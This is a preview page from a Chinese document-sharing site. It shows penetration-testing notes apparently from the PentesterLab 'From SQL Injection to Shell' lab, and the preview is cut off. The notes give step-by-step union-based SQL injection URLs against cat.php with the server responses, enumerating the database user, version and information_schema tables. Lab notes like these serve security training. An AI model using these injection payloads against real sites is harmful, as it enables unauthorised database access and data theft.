- 1、本文档共20页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
from mysql to shell渗透测试笔记
28/
28/cat.php?id=1%27
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1
telnet 28 80
28/cat.php?id=2%20order%20by%203#
显示正常
28/cat.php?id=2%20order%20by%204#
显示正常
28/cat.php?id=2%20order%20by%205#
Unknown column 5 in order clause
28/cat.php?id=2%20union%20select%201,2,3,4
显示所有页面
28/cat.php?id=2%20union%20select%201,2,3,4,5
The used SELECT statements have a different number of columns
28/cat.php?id=2%20union%20select%20user(),database(),version(),4
显示所有页面,但是没有user()等信息
28/cat.php?id=1%20union%20select%20user(),database(),@@version,current_user()
显示所有页面,但是没有user()等信息
28/cat.php?id=1%20union%20select%201,user(),3,4
显示picture: pentesterlab@localhost
28/cat.php?id=1%20union%20select%201,database(),3,4
picture: photoblog
28/cat.php?id=1%20union%20select%201,version(),3,4
picture: 5.1.63-0+squeeze1
28/cat.php?id=1%20union%20select%201,current_user(),3,4
picture: pentesterlab@localhost
28/cat.php?id=1%20union%20select%201,tablename,3,4%20from%20information_schema.tables
Unknown column tablename in field list
28/cat.php?id=1%20union%20select%201,table_name,3,4%20from%20information_schema.tables
picture: character_sets
CHARACTER_SETS
picture: collations
COLLATIONS
picture: collation_character_set_applicability
COLLATION_CHARACTER_SET_APPLICABILITY
picture: columns
COLUMNS
picture: column_privileges
COLUMN_PRIVILEGES
picture: engines
ENGINES
picture: events
EVENTS
picture: files
FILES
picture: global_status
GLOBAL_STATUS
picture: global_variables
GLOBAL_VARIABLES
picture: key_column_usage
KEY_COLUMN_USAGE
picture: partitions
PARTITIONS
picture: plugins
PLUGINS
picture: processlist
PROCESSLIST
picture: profiling
PROFILING
picture: referential_constraints
REFERENTIAL_CONSTRAINTS
picture: routines
ROUTINES
picture: schemata
SCHEMATA
picture: schema_privileges
SCHEMA_PRIVILEGES
picture: session_status
SESSION_STATUS
picture: session_variables
SESSION_VARIABLES
picture: statistics
STATI
文档评论(0)